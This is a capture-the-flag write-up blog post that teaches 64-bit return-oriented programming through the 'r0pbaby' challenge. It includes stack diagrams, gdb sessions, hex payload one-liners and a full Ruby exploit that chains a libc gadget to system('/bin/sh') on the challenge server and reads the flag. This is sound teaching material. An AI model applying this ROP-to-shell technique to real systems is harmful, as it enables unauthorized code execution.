This past weekend I competed in the Defcon CTF Qualifiers from the Legit Business Syndicate. In the past it’s been one of my favourite competitions, and this year was no exception!
Unfortunately, I got stuck for quite a long time on a 2-point problem (“wwtw”) and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!
r0pbaby is neat, because it’s an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode. Much of the time, it’s actually easier! You can see the binary, my solution, and other stuff I used on this github repo.
It might make sense to read a post I made in 2013 about a level in PlaidCTF called ropasaurusrex. But it’s not really necessary - I’m going to explain the same stuff again with two years more experience!
What is ROP?
Most modern systems have DEP - data execution prevention - enabled. That means that when trying to run arbitrary code, the code has be in memory that’s executable. Typically, when a process is running, all memory segments are either writable (+w) or executable (+x) - not both. That’s sometimes called “W^X”, but it seems more appropriate to just call it common sense.
ROP - return-oriented programming - is an exploitation technique that bypasses DEP. It does that by chaining together legitimate code that’s already in executable memory. This requires the attacker to either a) have complete control of the stack, or b) have control of rip/eip (the instruction pointer register) and the ability to change esp/rsp (the stack pointer) to point to another buffer.
As a quick example, let’s say you overwrite the return address of a vulnerable function with the address of libc’s sleep() function. When the vulnerable function attempts to return, instead of returning to where it’s supposed to (or returning to shellcode), it’ll return to the first line of sleep().
On a 32-bit system, sleep() will look at the next-to-next value on the stack to find out how long to sleep(). On a 64-bit system, it’ll look at the value of the rdi register for its argument, which is a little more elaborate to set up. When it’s done, it’ll return to the next value on the stack on both architectures, which could very well be another function.
So basically, sleep() expects its stack to look like on 32-bit:
+----------------------+ |...higher addresses...| +----------------------+ | 1000 | <-- sleep() looks here for its param (on 32-bit) +----------------------+ | [return addr] | <-- where esp will be when sleep() is entered +----------------------+ | [sleep's addr] | <-- return addr of previous function +----------------------+ |...lower addresses....| <-- other data from previous function +----------------------+
And on 64-bit:
+----------------------+ |...higher addresses...| +----------------------+ <-- sleep()'s param is in rdi, so it's not needed here | [return addr] | <-- where rsp will be when sleep() is entered +----------------------+ | [sleep's addr] | <-- return addr of previous function +----------------------+ |...lower addresses....| <-- other data from previous function +----------------------+
We’ll dive into deeper detail of how to set this up and see way more stack diagrams shortly. But let’s start from the beginning!
Taking a first look
When you run r0pbaby, or connect to their service, you will see a prompt (the program uses stdin/stdout for i/o):
$ ./r0pbaby Welcome to an easy Return Oriented Programming challenge... Menu: 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit :
It’s worthwhile messing with the options a bit to get a feel for it:
$ ./r0pbaby Welcome to an easy Return Oriented Programming challenge... Menu: 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : 1 libc.so.6: 0x00007FFFF7FF8B28 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : 2 Enter symbol: system Symbol system: 0x00007FFFF7883960 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : 2 Enter symbol: printf Symbol printf: 0x00007FFFF7892F10 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : 3 Enter bytes to send (max 1024): hello??? Invalid amount. 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit :
We’ll look at option 3 more in a little while, but for now let’s take a quick look at options 1 and 2. The rest of this section isn’t directly applicable to the exploitation stuff, so you’re free to skip it if you want. :)
If you look at the results from option 1 and option 2, you’ll see one strange thing: the return from “Get libc address” is higher than the addresses of printf() and system(). It also isn’t page aligned (a multiple of 0x1000 (4096), usually), so it almost certainly isn’t actually the base address (which, in fairness, the level doesn’t explicitly say it is).
I messed around a bit out of curiosity. Here’s what I discovered…
First, run the program in gdb and get the address that they claim is libc:
$ gdb -q ./r0pbaby Reading symbols from ./r0pbaby...(no debugging symbols found)...done. (gdb) run Starting program: /home/ron/defcon-quals/r0pbaby/r0pbaby Welcome to an easy Return Oriented Programming challenge... Menu: 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : 1 libc.so.6: 0x00007FFFF7FF8B28 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit
So that’s what it returns: 0x00007FFFF7FF8B28. Now we use ctrl-c to break into the debugger and figure out the real base address:
: ^C Program received signal SIGINT, Interrupt. 0x00007ffff791e5e0 in __read_nocancel () from /lib64/libc.so.6 (gdb) info proc map process 5475 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x555555554000 0x555555556000 0x2000 0x0 /home/ron/defcon-quals/r0pbaby/r0pbaby 0x555555755000 0x555555757000 0x2000 0x1000 /home/ron/defcon-quals/r0pbaby/r0pbaby 0x555555757000 0x555555778000 0x21000 0x0 [heap] 0x7ffff7842000 0x7ffff79cf000 0x18d000 0x0 /lib64/libc-2.20.so 0x7ffff79cf000 0x7ffff7bce000 0x1ff000 0x18d000 /lib64/libc-2.20.so 0x7ffff7bce000 0x7ffff7bd2000 0x4000 0x18c000 /lib64/libc-2.20.so 0x7ffff7bd2000 0x7ffff7bd4000 0x2000 0x190000 /lib64/libc-2.20.so [...]
This tells us that the actual address where libc is loaded is 0x7ffff7842000. Theirs was definitely wrong!
On a Linux system, the first 4 bytes at the base address will usually be “\x7fELF” or “\x7f\x45\x4c\x46”. We can check the first four bytes at the actual base address to verify:
(gdb) x/8xb 0x7ffff7842000 0x7ffff7842000: 0x7f 0x45 0x4c 0x46 0x02 0x01 0x01 0x00 (gdb) x/8xc 0x7ffff7842000 0x7ffff7842000: 127 '\177' 69 'E' 76 'L' 70 'F' 2 '\002' 1 '\001' 1 '\001' 0 '\000'
And we can check the base address that the program tells us:
(gdb) x/8xb 0x00007FFFF7FF8B28 0x7ffff7ff8b28: 0x00 0x20 0x84 0xf7 0xff 0x7f 0x00 0x00
From experience, that looks like a 64-bit address to me (6 bytes long, starts with 0x7f if you read it in little endian), so I tried print it as a 64-bit value:
(gdb) x/xg 0x00007FFFF7FF8B28 0x7ffff7ff8b28: 0x00007ffff7842000
Aha! It’s a pointer to the actual base address! It seems a little odd to send that to the user, it does them basically no good, so I’ll assume that it’s a bug. :)
Stealing libc
If there’s one thing I hate, it’s attacking a level blind. Based on the output so far, it’s pretty clear that they’re going to want us to call a libc function, but they don’t actually give us a copy of libc.so! While it’s not strictly necessary, having a copy of libc.so makes this far easier.
I’ll post more details about how and why to steal libc in a future post, but for now, suffice to stay: if you can, beat the easiest 64-bit level first (like babycmd) and liberate a copy of libc.so. Also snag a 32-bit version of libc if you can find one. Believe me, you’ll be thankful for it later! To make it possible to follow the rest of this post, here’s libc-2.19.so from babycmd and here’s libc-2.20.so from my box, which is the one I’ll use for this writeup.
You might be wondering how to verify whether or not that actually IS the right library. For now, let’s consider that to be homework. I’ll be writing more about that in the future, I promise!
Find a crash
I played around with option 3 for awhile, but it kept giving me a length error. So I used the best approach for annoying CTF problems: I asked a teammate who’d already solved that problem. He’d reverse engineered the function already, saving me the trouble. :)
It turns out that the correct way to format things is by sending a length, then a newline, then the payload:
$ ./r0pbaby Welcome to an easy Return Oriented Programming challenge... Menu: 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : 3 Enter bytes to send (max 1024): 20 AAAAAAAAAAAAAAAAAAAA 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : Bad choice. Segmentation fault
Well, that may be one of the easiest ways I’ve gotten a segfault! But the work isn’t quite done. :)
rip control
Our first goal is going to be to get control of rip (that’s like eip, the instruction pointer, but on a 64-bit system). As you probably know by now, rip is the register that points to the current instruction being executed. If we move it, different code runs. The classic attack is to move eip to point at shellcode, but ROP is different. We want to carefully control rip to make sure it winds up in all the right places.
But first, let’s non-carefully control it!
The program indicates that it’s writing the r0p buffer to the stack, so the easiest thing to do is probably to start throwing stuff into the buffer to see what happens. I like to send a string with a series of values I’ll recognize in a debugger. Since it’s a 64-bit app, I send 8 “A”s, 8 “B”s, and so on. If it doesn’t crash. I send more.
$ gdb -q ./r0pbaby (gdb) run [...] : 3 Enter bytes to send (max 1024): 32 AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : Bad choice. Program received signal SIGSEGV, Segmentation fault. 0x0000555555554eb3 in ?? ()
All right, it crashes at 0x0000555555554eb3. Let’s take a look at what lives at the current instruction (pro-tip: “x/i $rip” or equivalent is basically always the first thing I run on any crash I’m investigating):
(gdb) x/i $rip => 0x555555554eb3: ret
It’s crashing while attempting to return! That generally only happens when either the stack pointer is messed up…
(gdb) print/x $rsp $1 = 0x7fffffffd918
…which it doesn’t appear to be, or when it’s trying to return to a bad address…
(gdb) x/xg $rsp 0x7fffffffd918: 0x4242424242424242
…which it is! It’s trying to return to 0x4242424242424242 (“BBBBBBBB”), which is an illegal address (the first two bytes have to be zero on a 64-bit system).
We can confirm this, and also prove to ourselves that NUL bytes are allowed in the input, by sending a couple of NUL bytes. I’m switching to using ‘echo’ on the commandline now, so I can easily add NUL bytes (keep in mind that because of little endian, the NUL bytes have to go after the “B”s, not before):
$ ulimit -c unlimited $ echo -ne '3\n32\nAAAAAAAABBBBBB\0\0CCCCCCCCDDDDDDDD\n' | ./r0pbaby [...] Segmentation fault (core dumped) $ gdb ./r0pbaby ./core [...] Program terminated with signal SIGSEGV, Segmentation fault. #0 0x0000424242424242 in ?? ()
Now we can see that rip was successfully set to 0x0000424242424242 (“BBBBBB\0\0” because of little endian)!
How's the stack work again?
As I said at the start, reading my post about ropasaurusrex would be a good way to get acquainted with ROP exploits. If you’re pretty comfortable with stacks or you’ve recently read/understood that post, feel free to skip this section!
Let’s start by talking about 32-bit systems - where parameters are passed on the stack instead of in registers. I’ll explain how to deal with register parameters in 64-bit below.
Okay, so: a program’s stack is a run-time structure that holds temporary values that functions need. Things like the parameters, the local variables, the return address, and other stuff. When a function is called, it allocates itself some space on the stack by growing downward (towards lower memory addresses) When the function returns, the data’s all removed from the stack (it’s not actually wiped from memory, it just becomes free to get overwritten). The register rsp always points to the most recent thing pushed to the stack and the next thing that would be popped off the stack.
Let’s use sleep() as an example again. You call sleep() like this:
1: push 1000 2: call sleep
or like this:
1. mov [esp], 1000 2: call sleep
They’re identical, as far as sleep() is concerned. The first is a tiny bit more memory efficient and the second is a tiny bit faster, but that’s about it.
Before line 1, we don’t know or care what’s on the stack. We can look at it like this (I’m choosing completely arbitrary addresses so you can match up diagrams with each other):
+----------------------+ |...higher addresses...| +----------------------+ 0x1040 | (irrelevant) | +----------------------+ 0x103c | (irrelevant) | +----------------------+ 0x1038 | (irrelevant) | <-- rsp +----------------------+ 0x1034 | (unused) | +----------------------+ 0x1030 | (unused) | +----------------------+ |...lower addresses....| +----------------------+
Values lower than rsp are unused. That means that as far as the stack’s concerned, they’re unallocated. They might be zero, or they might contain values from previous function calls. In a properly working system, they’re never read. If they’re accidentally used (like if somebody declares a variable but forgets to initialize it), you could wind up with a use-after-free vulnerability or similar.
The value that rsp is pointing to and the values above it (at higher addresses) also don’t really matter. They’re part of the stack frame for the function that’s calling sleep(), and sleep() doesn’t care about those. It only cares about its own stack frame (a stack frame, as we’ll see, is the parameters, return address, saved registers, and local variables of a function - basically, everything the function stores on the stack and everything it cares about on the stack).
Line 1 pushes 1000 onto the stack. The frame will then look like this:
+----------------------+ |...higher addresses...| +----------------------+ 0x103c | (irrelevant) | +----------------------+ 0x1038 | (irrelevant) | <-- stuff from the previous function +----------------------+ +----------------------+ <-- start of sleep()'s stack frame 0x1034 | 1000 | <-- rsp +----------------------+ 0x1030 | (unused) | +----------------------+ |...lower addresses....| +----------------------+
When you call the function at line 2, it pushes the return address onto the stack, like this:
+----------------------+ |...higher addresses...| +----------------------+ 0x1038 | (irrelevant) | +----------------------+ +----------------------+ <-- start of sleep()'s stack frame 0x1034 | 1000 | +----------------------+ 0x1030 | [return addr] | <-- rsp +----------------------+ 0x102c | (unused) | +----------------------+ 0x1028 | (unused) | +----------------------+ 0x1024 | (unused) | +----------------------+ |...lower addresses....| +----------------------+
Note how rsp has moved from 0x1038 to 0x1034 to 0x1030 as stuff is added to the stack. But it always points to the last thing added!
Let’s look at how sleep() might be implemented. This is a very common function prelude:
100; sleep(): 101: push rbp 102: mov rbp, rsp 103: sub rsp, 0x20 104: …everything else…
(Note that those are line numbers for reference, not actual addresses, so please don’t get upset that the values don’t increment enough :) )
At line 100, the old frame pointer is saved to the stack:
+----------------------+ |...higher addresses...| +----------------------+ 0x1038 | (irrelevant) | +----------------------+ +----------------------+ <-- start of sleep()'s stack frame 0x1034 | 1000 | +----------------------+ 0x1030 | [return addr] | +----------------------+ 0x102c | [saved frame] | <-- rsp +----------------------+ 0x1028 | (unused) | +----------------------+ 0x1024 | (unused) | +----------------------+ 0x1020 | (unused) | +----------------------+ |...lower addresses....| +----------------------+
Then at line 102, nothing on the stack changes. On line 103, 0x20 is subtracted from esp, which effectively reserves 0x20 (32) bytes for local variables:
+----------------------+ |...higher addresses...| +----------------------+ 0x1038 | (irrelevant) | +----------------------+ +----------------------+ <-- start of sleep()'s stack frame 0x1034 | 1000 | +----------------------+ 0x1030 | [return addr] | +----------------------+ 0x102c | [saved frame] | +----------------------+ | | 0x1028 | | - | [local vars] | <-- rsp 0x1008 | | | | +----------------------+ <-- end of sleep()'s stack frame +----------------------+ 0x1004 | (unused) | +----------------------+ 0x1000 | (unused) | +----------------------+ |...lower addresses....| +----------------------+
And that’s the entire stack frame for the sleep(0 function call! It’s possible that there are other registers preserved on the stack, in addition to rbp, but that doesn’t really change anything. We only care about the parameters and the return address.
If sleep() calls a function, the same process will happen:
+----------------------+ |...higher addresses...| +----------------------+ 0x1038 | (irrelevant) | +----------------------+ +----------------------+ <-- start of sleep()'s stack frame 0x1034 | 1000 | +----------------------+ 0x1030 | [return addr] | +----------------------+ 0x102c | [saved frame] | +----------------------+ | | 0x1028 | | - | [local vars] | 0x1008 | | | | +----------------------+ <-- end of sleep()'s stack frame +----------------------+ <-- start of next function's stack frame 0x1004 | [params] | +----------------------+ 0x1000 | [return addr] | +----------------------+ 0x0ffc | [saved frame] | +----------------------+ | | 0x0ffc | | - | [local vars] | 0x0fb4 | | | | +----------------------+ <-- end of next function's stack frame +----------------------+ 0x0fb0 | (unused) | +----------------------+ 0x0fac | (unused) | +----------------------+ |...lower addresses....| +----------------------+
And so on, with the stack constantly growing towards lower addresses. When the function returns, the same thing happens in reverse order (the local vars are removed from the stack by adding to rsp (or replacing it with rbp), rbp is popped off the stack, and the return address is popped and returned to).
The parameters are cleared off the stack by either the caller or callee, depending on the compiler, but that won’t come into play for this writeup. However, when ROP is used to call multiple functions, unless the function clean up their own parameters off the stack, the exploit developer has to do it themselves. Typically, on Windows functions clean up after themselves but on other OSes they don’t (but you can’t rely on that). This is done by using a “pop ret”, “pop pop ret”, etc., after each function call. See my ropasaurusrex writeup for more details.
Enter: 64-bit
The fact that this level is 64-bit complicates things in important ways (and ways that I always seem to forget about till things don’t work).
Specifically, in 64-bit, the first handful of parameters to a function are passed in registers, not on the stack. I don’t have the order of registers memorized - I forget it after every CTF, along with whether ja/jb or jl/jg are the unsigned ones - but the first two are rdi and rsi. That means that to call the same sleep() function on 64-bit, we’d have this code instead:
1: mov rdi, 1000 2: call sleep
And its stack frame would look like this:
+----------------------+ |...higher addresses...| +----------------------+ <-- start of previous function's stack frame +----------------------+ <-- start of sleep()'s stack frame 0x1030 | [return addr] | +----------------------+ 0x102c | [saved frame] | +----------------------+ | | 0x1028 | | - | [local vars] | 0x1008 | | | | +----------------------+ <-- end of sleep()'s stack frame +----------------------+ |...lower addresses....| +----------------------+
No parameters, just the return address, saved frame pointer, and local variables. It’s exceedingly rare for the stack to be used for parameters on 64-bit.
Stacks: the important bit
Okay, so that’s a stack frame. A stack frame contains parameters, return address, saved registers, and local variables. On 64-bit, it usually contains the return address, saved registers, and local variables (no parameters).
But here’s the thing: when you enter a function - that is to say, when you start running the first line of the function - the function doesn’t really know where you came from. I mean, not really. It knows the return address that’s on the stack, but doesn’t really have a way to validate that it’s real (except with advanced exploitation mitigations). It also knows that there are some parameters right before (at higher addresses than) the return address, if it’s 32-bit. Or that rdi/rsi/etc. contain parameters if it’s 64-bit.
So let’s say you overwrote the return address on the stack and returned to the first line of sleep(). What’s it going to do?
As we saw, on 64-bit, sleep() expects its stack frame to contain a return address:
+----------------------+ |...higher addresses...| +----------------------+ +----------------------+ <-- start of sleep()'s stack frame | [return addr] | <-- rsp +----------------------+ | (unallocated) | +----------------------+ |...lower addressess...| +----------------------+
sleep() will push some registers, make room for local variables, and really just do its own thing. When it’s all done, it’ll grab the return address from the stack, return to it, and somebody will move rsp back to the calling function’s stack frame (it, getting rid of the parameters from the stack).
Using system()
Because this level uses stdout and stdin for i/o, all we really have to do is make this call:
system("/bin/sh")
Then we can run arbitrary commands. Seems pretty simple, eh? We don’t even care where system() returns to, once it’s done the program can just crash!
You just have to do two things:
- set rip to the address of system()
- set rdi to a pointer to the string "/bin/sh" (or just "sh" if you prefer)
Setting rip to the address of system() is easy. We have the address of system() and we have rip control, as we discovered. It’s just a matter of grabbing the address of system() and using that in the overflow.
Setting rdi to the pointer to “/bin/sh” is a little more problematic, though. First, we need to find the address of “/bin/sh” somehow. Then we need a “gadget” to put it in rdi. A “gadget”, in ROP, refers to a small piece of code that performs an operation then returns.
It turns out, all of the above can be easily done by using a copy of libc.so. Remember how I told you it’d come in handy?
Finding "/bin/sh"
So, this is actually pretty easy. We need to find “/bin/sh” given a) the ability to leak an address in libc.so (which this program does by design), and b) a copy of libc.so. Even with ASLR turned on, any two addresses within the same binary (like within libc.so or within the binary itself) won’t change their relative positions to each other. Addresses in two different binaries will likely be different, though.
If you fire up IDA, and go to the “strings” tab (shift-F12), you can search for “/bin/sh”. You’ll see that “/bin/sh” will have an address something like 0x7ffff6aa307c.
Alternatively, you can use this gdb command (helpfully supplied by bla from io.sts):
(gdb) find /b 0x7ffff7842000,0x7ffff7bd4000, '/','b','i','n','/','s','h' 0x7ffff79a307c warning: Unable to access 16000 bytes of target memory at 0x7ffff79d5d03, halting search. 1 pattern found. (gdb) x/s 0x7ffff79a307c 0x7ffff79a307c: "/bin/sh"
Once you’ve obtained the address of “/bin/sh”, find the address of any libc function - we’ll use system(), since system() will come in handy later. The address will be something like 0x00007ffff6983960. If you subtract the two addresses, you’ll discover that the address of “/bin/sh” is 0x11f71c bytes after the address of system(). As I said earlier, that won’t change, so we can reliably use that in our exploit.
Now when you run the program:
$ ./r0pbaby Welcome to an easy Return Oriented Programming challenge... Menu: 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : 2 Enter symbol: system Symbol system: 0x00007FFFF7883960
You can easily calculate that the address of the string “/bin/sh” will be at 0x00007ffff7883960 + 0x11f71c = 0x7ffff79a307c.
Getting "/bin/sh" into rdi
The next thing you’ll want to do is put “/bin/sh” into rdi. We can do that in two steps (recall that we have control of the stack - it’s the point of the level):
- Put it on the stack
- Find a "pop rdi" gadget
To do this, I literally searched for “pop rdi” in IDA. With the spaces and everything! :)
I found this in both my own copy of libc and the one I stole from babycmd:
.text:00007FFFF80E1DF1 pop rax .text:00007FFFF80E1DF2 pop rdi .text:00007FFFF80E1DF3 call rax
What a beautiful sequence! It pops the next value of the stack into rax, pops the next value into rdi, and calls rax. So it calls an address from the stack with a parameter read from the stack. It’s such a lovely gadget! I was surprised and excited to find it, though I’m sure every other CTF team already knew about it. :)
The absolute address that IDA gives us is 0x00007ffff80e1df1, but just like the “/bin/sh” string, the address relative to the rest of the binary never changes. If you subtract the address of system() from that address, you’ll get 0xa7969 (on my copy of libc).
Let’s look at an example of what’s actually going on when we call that gadget. You’re at the end of main() and getting ready to return. rsp is pointing to what it thinks is the return address, but is really “BBBBBBBB”-now-gadget_addr:
+----------------------+ |...higher addresses...| +----------------------+ | DDDDDDDD | +----------------------+ | CCCCCCCC | +----------------------+ | 0x00007ffff80e1df1 | <-- rsp +----------------------+ | AAAAAAAA | +----------------------+ |...lower addresses....| +----------------------+
When the return happens, it looks like this:
+----------------------+ |...higher addresses...| +----------------------+ | DDDDDDDD | +----------------------+ | CCCCCCCC | <-- rsp +----------------------+ | 0x00007FFFF80E1DF1 | +----------------------+ | AAAAAAAA | +----------------------+ |...lower addresses....| +----------------------+
The first instruction - pop rax - runs. rax is now 0x4343434343434343 (“CCCCCCCC”).
The second instruction - pop rdi - runs. rdi is now 0x4444444444444444 (“DDDDDDDD”).
Then the final instruction - call rax - is called. It’ll attempt to call 0x4343434343434343, with 0x4444444444444444 as its parameter, and crash. Controlling both the called address and the parameter is a huge win!
Putting it all together
I realize this is a lot to take in if you can’t read stacks backwards and forwards (trust me, I frequently read stacks backwards - in fact, I wrote this entire blog post with upside-down stacks before I noticed and had to go back and fix it! :) ).
Here’s what we have:
- The ability to write up to 1024 bytes onto the stack
- The ability to get the address of system()
- The ability to get the address of "/bin/sh", based on the address of system()
- The ability to get the address of a sexy gadget, also based on system(), that'll call something from the stack with a parameter from the stack
We’re overflowing a local variable in main(). Immediately before our overflow, this is what main()’s stack frame probably looks like:
+----------------------+ |...higher addresses...| +----------------------+ <-- start of main()'s stack frame | argv | +----------------------+ | argc | +----------------------+ | [return addr] | <-- return address of main() +----------------------+ | [saved frame] | <-- overflowable variable must start here +----------------------+ | | | | | [local vars] | <-- rsp | | | | +----------------------+ <-- end of main()'s stack frame |...lower addresses....| +----------------------+
Because you only get 8 bytes before you hit the return address, the first 8 bytes are probably overwriting the saved frame pointer (or whatever, it doesn’t really matter, but you can prove it’s the frame pointer by using a debugger and verifying that rbp is 0x4141414141414141 after it returns (it is)).
The main thing is, as we saw earlier, if you send the string “AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD”, the “BBBBBBBB” winds up as main()’s return address. That means the stack winds up looking like this before main() starts cleaning up its stack frame:
+----------------------+ |...higher addresses...| +----------------------+ <-- WAS the start of main()'s stack frame | DDDDDDDD | +----------------------+ | CCCCCCCC | +----------------------+ | BBBBBBBB | <-- return address of main() +----------------------+ | AAAAAAAA | <-- overflowable variable must start here +----------------------+ | | | | | [local vars] | | | | | <-- rsp +----------------------+ <-- end of main()'s stack frame |...lower addresses....| +----------------------+
When main attempts to return, it tries to return to 0x4242424242424242 as we saw earlier, and it crashes.
Now, one thing we can do is return directly to system(). But your guess is as good as mine as to what’s in rdi, but you can bet it’s not going to be “/bin/sh”. So instead, we return to our gadget:
+----------------------+ |...higher addresses...| +----------------------+ <-- start of main()'s stack frame | DDDDDDDD | +----------------------+ | CCCCCCCC | +----------------------+ | gadget_addr | <-- return address of main() +----------------------+ | AAAAAAAA | <-- overflowable variable must start here +----------------------+ | | | | | [local vars] | | | | | <-- rsp +----------------------+ <-- end of main()'s stack frame |...lower addresses....| +----------------------+
Since I have ASLR off on my computer (if you do turn it off, please make sure you turn it back on!), I can pre-compute the addresses I need.
Symbol system: 0x00007FFFF7883960 (from the program)
sh_addr = system_addr + 0x11f71c sh_addr = 0x00007ffff7883960 + 0x11f71c sh_addr = 0x7ffff79a307c
gadget_addr = system_addr + 0xa7969 gadget_addr = 0x00007ffff7883960 + 0xa7969 gadget_addr = 0x7ffff792b2c9
So now, let’s change the exploit we used to crash it a long time ago (we replace the “B”s with the address of our gadget, in little endian format:
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCCDDDDDDDD\n' | ./r0pbaby Welcome to an easy Return Oriented Programming challenge... [...] Menu: Segmentation fault (core dumped)
Great! It crashed as expected! Let’s take a look at HOW it crashed:
$ gdb -q ./r0pbaby ./core Core was generated by `./r0pbaby'. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x00007ffff792b2cb in clone () from /lib64/libc.so.6 (gdb) x/i $rip => 0x7ffff792b2cb <clone+107>: call rax
It crashed on the call at the end of the gadget, which makes sense! Let’s check out what it’s trying to call and what it’s using as a parameter:
(gdb) print/x $rax $1 = 0x4343434343434343 (gdb) print/x $rdi $2 = 0x4444444444444444
It’s trying to call “CCCCCCCC” with the parameter “DDDDDDDD”. Awesome! Let’s try it again, but this time we’ll plug in our sh_address in place of “DDDDDDDD” to make sure that’s working (I strongly believe in incremental testing :) ):
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCC\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby [...] Segmentation fault (core dumped) $ gdb -q ./r0pbaby ./core [...] (gdb) x/i $rip => 0x7ffff792b2cb <clone+107>: call rax
It’s still crashing in the same place! We don’t have to check rax, we know it’ll be 0x4343434343434343 (“CCCCCCCC”) again. But let’s check out if rdi is right:
(gdb) print/x $rdi $2 = 0x7ffff79a307c (gdb) x/s $rdi 0x7ffff79a307c: "/bin/sh"
All right, the parameter is set properly!
One last step: Replace the return address (“CCCCCCCC”) with the address of system 0x00007ffff7883960:
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x60\x39\x88\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby
Unfortunately, you can’t return into system(). I couldn’t figure out why, but on Twitter Jan Kadijk said that it’s likely because system() ends when it sees the end of file (EOF) marker, which makes perfect sense.
So in the interest of proving that this actually returns to a function, we’ll call printf (0x00007FFFF7892F10) instead:
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x10\x2f\x89\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby Welcome to an easy Return Oriented Programming challenge... Menu: 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : Enter bytes to send (max 1024): 1) Get libc address 2) Get address of a libc function 3) Nom nom r0p buffer to stack 4) Exit : Bad choice. /bin/sh
It prints out its first parameter - “/bin/sh” - proving that printf() was called and therefore the return chain works!
The exploit
Here’s the full exploit in Ruby. If you want to run this against your own system, you’ll have to calculate the offset of the “/bin/sh” string and the handy-dandy gadget first! Just find them in IDA or objdump or whatever and subtract the address of system() from them.
#!/usr/bin/ruby require 'socket' SH_OFFSET_REAL = 0x13669b SH_OFFSET_MINE = 0x11f71c GADGET_OFFSET_REAL = 0xb3e39 GADGET_OFFSET_MINE = 0xa7969 #HOST = "localhost" HOST = "r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me" PORT = 10436 s = TCPSocket.new(HOST, PORT) # Receive until the string matches the regex, then delete everything # up to the regex def recv_until(s, regex) buffer = "" loop do buffer += s.recv(1024) if(buffer =~ /#{regex}/m) return buffer.gsub(/.*#{regex}/m, '') end end end # Get the address of "system" puts("Getting the address of system()...") s.write("2\n") s.write("system\n") system_addr = recv_until(s, "Symbol system: ").to_i(16) puts("system() is at 0x%08x" % system_addr) # Build the ROP chain puts("Building the ROP chain...") payload = "AAAAAAAA" + [system_addr + GADGET_OFFSET_REAL].pack("<Q") + # address of the gadget [system_addr].pack("<Q") + # address of system [system_addr + SH_OFFSET_REAL].pack("<Q") + # address of "/bin/sh" "" # Write the ROP chain puts("Sending the ROP chain...") s.write("3\n") s.write("#{payload.length}\n") s.write(payload) # Tell the program to exit puts("Exiting the program...") s.write("4\n") # Give sh some time to start puts("Pausing...") sleep(1) # Write the command we want to run puts("Attempting to read the flag!") s.write("cat /home/r0pbaby/flag\n") # Receive forever loop do x = s.recv(1024) if(x.nil? || x == "") puts("Done!") exit end puts(x) end
[update] Or... do it the easy way
After I posted this, I got a tweet from @gaasedelen informing me that libc has a “magic” address that will literally call exec() with “/bin/sh”, making much of this unnecessary for this particular level. You can find it by seeing where the “/bin/sh” string is referenced. You can return to that address and a shell pops.
But it’s still a good idea to know how to construct a ROP chain, even if it’s not strictly necessary. :)
Conclusion
And that’s how to perform a ROP attack against a 64-bit binary! I’d love to hear feedback!
Comments
Join the conversation on this Mastodon post (replies will appear below)!
Loading comments...